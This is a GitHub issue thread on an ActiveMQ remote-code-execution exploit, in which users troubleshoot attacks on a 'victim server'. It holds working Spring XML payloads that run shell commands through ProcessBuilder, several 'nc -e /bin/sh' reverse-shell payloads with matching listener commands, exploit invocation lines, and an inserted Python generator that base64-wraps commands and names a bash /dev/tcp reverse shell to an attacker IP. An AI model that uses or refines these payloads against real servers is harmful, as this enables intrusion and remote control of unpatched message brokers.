X1r0z/ActiveMQ-RCE

No output

mhammadkassem opened this issue · 28 comments

Hello,

I am using Kali, and I run a server on port 5555, and then I tried to run your code using the command below:

/ActiveMQ-RCE -i [victim IP] -u http://[kali server IP]:5555/poc.xml

and in the poc.xml I wrote the following:

<?xml version="1.0" encoding="UTF-8" ?>
    <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg >
            <list>
                <value>sh/value>
                <value>-c</value>
                <value>echo 'Hello, World!' > hello.txt</value>
            </list>
            </constructor-arg>
        </bean>
    </beans>

I run the command, then nothing happens. Am I doing something wrong?
Note that on the victim server I confirmed that port 61616 is running.

Yes, I got this problem also.

X1r0z commented

First, there is a typo in your xml: <value>sh/value> should be <value>sh</value>

Second, it is an XML file, which means the char > will be parsed as an XML tag, so echo 'Hello, World!' > hello.txt will finally lead to a syntax error.

You can refer to: https://r0yanx.com/tools/java_exec_encode/
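To make the point above concrete, here is an added example (my own helper, not code from the X1r0z/ActiveMQ-RCE repository or from the linked encoder page) that renders a ProcessBuilder bean of the shape posted in this thread, XML-escapes each argv value (a raw & or < is illegal in XML text, and > is safest escaped as well), and offers a second route that avoids the question entirely by base64-wrapping the command behind bash brace expansion. It also re-parses the result with a strict XML parser, which is what rejects the "<value>sh/value>" typo, and checks that the document actually contains a java.lang.ProcessBuilder bean with init-method="start", since without that nothing executes no matter how many times the target fetches the file. The attacker IP/port 10.20.20.20/6666 in the usage line are the ones used later in this thread.

```python
"""Generate and sanity-check a Spring bean payload for ActiveMQ-RCE.

Added example, not code from the X1r0z/ActiveMQ-RCE repository.  The bean
shape (java.lang.ProcessBuilder with init-method="start") is the one posted in
this thread; the encoder and the checker are this example's own.
"""
import base64
import sys
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SPRING_NS = "http://www.springframework.org/schema/beans"

TEMPLATE = """<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
{values}
            </list>
        </constructor-arg>
    </bean>
</beans>
"""


def build_xml(argv):
    """Render argv as <value> elements, XML-escaping &, < and > in each one."""
    values = "\n".join(f"                <value>{escape(arg)}</value>" for arg in argv)
    return TEMPLATE.format(values=values)


def encode_command(cmd):
    """Wrap a shell command so the argv carries no quotes, spaces or XML metacharacters.

    Same trick as the java_exec_encode page linked above: bash brace expansion
    turns {echo,<b64>} into `echo <b64>`, and base64 text never contains <, > or &.
    """
    b64 = base64.b64encode(cmd.encode()).decode()
    return ["bash", "-c", "{echo,%s}|{base64,-d}|{bash,-i}" % b64]


def decode_command(argv):
    """Inverse of encode_command, used to double-check a payload before serving it."""
    inner = argv[2][len("{echo,"):argv[2].index("}")]
    return base64.b64decode(inner).decode()


def is_well_formed(xml_text):
    """True if a strict XML parser (as Spring uses) accepts the document at all."""
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False


def parse_argv(xml_text):
    """Return the argv the bean hands to ProcessBuilder, or raise if nothing would run."""
    root = ET.fromstring(xml_text)
    ns = {"b": SPRING_NS}
    bean = root.find("b:bean", ns)
    if bean is None or bean.get("class") != "java.lang.ProcessBuilder" \
            or bean.get("init-method") != "start":
        raise ValueError("no ProcessBuilder bean with init-method=start; nothing would execute")
    return [v.text or "" for v in bean.findall("b:constructor-arg/b:list/b:value", ns)]


# The first poc.xml posted in this thread, reproduced to show the failure mode:
# "<value>sh/value>" never closes its element, so the whole document is rejected.
TYPO_XML = TEMPLATE.format(values=(
    "                <value>sh/value>\n"
    "                <value>-c</value>\n"
    "                <value>touch hello.txt</value>"))

if __name__ == "__main__":
    # usage: python3 gen_poc.py "bash -i >& /dev/tcp/10.20.20.20/6666 0>&1" > poc.xml
    # (attacker IP/port taken from this thread; the /dev/tcp shell needs no nc -e)
    print(build_xml(encode_command(sys.argv[1])), end="")
```

Either route works; the base64 one has the added benefit that the command can contain quotes and redirections such as the bash /dev/tcp reverse shell without ever touching the XML, and a bash /dev/tcp shell does not depend on the target's netcat supporting -e. Remember that whatever runs, runs with the broker's user and working directory, so write test files to an absolute path such as /tmp rather than a relative hello.txt.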

It worked now: it connects to my server. I adjusted the xml file to only create a file called hello.txt on the server, but I couldn't find the file. However, I was wondering why we need to add a poc.xml file when we can open a reverse shell. I mean, since the victim server is connecting to my server, do we still need a poc.xml, or can we just let the server connect and get a reverse shell?

this is my xml file: 

<?xml version="1.0" encoding="UTF-8" ?>
    <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg >
            <list>
                <value>sh</value>
                <value>-c</value>
                <value>touch hello.txt</value>
            </list>
            </constructor-arg>
        </bean>
    </beans>

So the point is that the victim server is connecting to my server, but the poc.xml is not doing anything. Can you please clarify what the role of the poc.xml file is? Because without it the victim is initiating a connection to my server, which is an issue in itself.

Okay, so I tried to run a listener on my machine: nc -lvp 6666.
and I updated the poc.xml file as follows:

<?xml version="1.0" encoding="UTF-8" ?>
    <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg >
            <list>
                <value>sh</value>
                <value>-c</value>
                <value>nc -e /bin/sh 10.20.20.20 6666</value>
            </list>
            </constructor-arg>
        </bean>
    </beans>

where 10.20.20.20 is the IP of my server.
I also run a simple http server on 5555.

All I see is the connection to 5555, but I never get a reverse shell.

Am I doing something wrong?

Hi @mhammadkassem, I saw you tried the reverse shell method via xml. So, did you run the calculator app or some other basic app? Because I cannot see the calculator app on the screen when I try to send a request with the xml file. So, can you share details of how you did it, if you have them?

Hello @markdown0,

No, I was not able to get a reverse shell; I was trying to but I couldn't.
I tried several things in the xml file but none of them worked.
What I tried:

  • creating simple hello.txt file
  • reverseshell

None of these worked, but the weird thing is that the server connects to my http listening port.

Yes, I am stuck in the same area also. It doesn't work.

@markdown0 is it connecting to your http listening port?

Yes, I can see all of the connections in the browser, but running the app doesn't seem suitable for now. You can see my problem in the other topic: #3

@mhammadkassem I did it bro, you can use the shared xml code, it works for me:

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="
 http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
        <list>
                <value>sh</value>
                <value>-c</value>
                <value>nc -e /bin/sh 'IP' 4444</value>
        </list>
        </constructor-arg>
    </bean>
</beans>

and after the go build & run process, you can use the nc -lvnp 4444 listening process:
./main -i 'target ip' -u http://127.0.0.1:8001/poc-linux.xml
nc -lvnp 4444

Hello @markdown0,

The xml code you attached seems to be mixed with your comment, can you please correct it? And why did this xml code work? What was the issue?

@markdown0
I just noticed that the xml you used is the same as the one I attached, no?

Hello @X1r0z,

Can you please help me understand how the xml file is consumed by ActiveMQ and how it will then run the shell commands?
I need to understand that to know why, in my case, the xml file is not consumed and the shell commands are not run.
Thanks in advance!

@mhammadkassem,
To understand clearly, you can use Wireshark to see if your process runs correctly. I have tested it on Kali and it works. My tested version of ActiveMQ is 5.18.0. Maybe you can try the go file in other repos, because my code works in my GitHub repo:
https://github.com/FerdiGul/POC/tree/main/CVE-2023-26604

@FerdiGul,

Can you please share the step by step of your test?
In my case I have ActiveMQ (the version running is apache-activemq-5.7.0), and it is listening on port 61616.
When I run the activemq-rce from my Kali machine, which is running an http server on port 5555, I see that the victim server does a GET request for the poc.xml, but then nothing happens afterwards. (I also have a listener on port 6666 for the reverse shell.)

@mhammadkassem, you can check all of the steps as I share them:

Prepare the environment:

  1. Download the ActiveMQ 5.18.0 release from here:
     https://activemq.apache.org/activemq-5018000-release

  2. Install ActiveMQ based on the instructions, you can use this:
     https://www.techbeginner.in/2019/12/how-to-install-apache-activemq-on-ubuntu-16-04.html

  3. Tested on Kali (Debian) current distribution.

Build POC:

  1. $ python3 -m http.server 8001 (where the .xml poc file is)

  2. $ sudo go build main.go (build the go file)

  3. $ sudo go run main.go (or run it directly)

  4. $ systemctl status activemq (check the ActiveMQ service is up)

  5. Check the value tags in the xml file as:

            <value>sh</value>
            <value>-c</value>
            <value>nc -e /bin/sh <target_ip> 4444</value>

  6. Check the default values. You don't need to review them:
     flag.StringVar(&ip, "i", "", "ActiveMQ Server IP or Host")
     flag.StringVar(&port, "p", "61616", "ActiveMQ Server Port")
     flag.StringVar(&url, "u", "", "Spring XML Url")
     flag.Parse()

Run POC:

  1. $ ./main -i <target_ip> -u http://127.0.0.1:8001/poc-linux.xml
  2. $ nc -lvnp 4444 (listening for reverse shell)

@FerdiGul it's weird, I did exactly the same, but nothing happens.

Maybe you also need to try the chmod +x command on the poc directory where all of the files are. And you can check whether your ActiveMQ server is running via the web browser and systemctl status. (http://127.0.0.1:8161/index.html)

@FerdiGul, by the way, is it supposed to find the poc.xml file on the victim server? Because after running the poc, even though I see that the victim server did a GET request for the poc.xml, I still can't find the poc.xml file on the victim server.

@FerdiGul, where should I launch the chmod? On the victim server?

@mhammadkassem I think you can try it locally first, and when you have checked that it runs correctly you can try the remote server. But you know, chmod +x gives high privileges to the poc directory files.

@FerdiGul, the remote server is doing a GET for poc.xml, but I need to know if I should see the file on the remote server (aka the victim server) or not, because there is no poc.xml file downloaded even though it connects to my server. It is very weird :/

@X1r0z any idea what could be the issue?
I need to understand how the xml file will be consumed by the server, because it seems it is never executed.

Hello @markdown0,
In your case, when you run the command, can you please confirm whether you get the poc.xml file on the victim server?

Hello @X1r0z, is ActiveMQ version 5.7.0 vulnerable to this?

@mhammadkassem poc.xml doesn't need to be on the victim server, because you use the http.server to serve the file from the source IP (localhost in this case) to the victim address.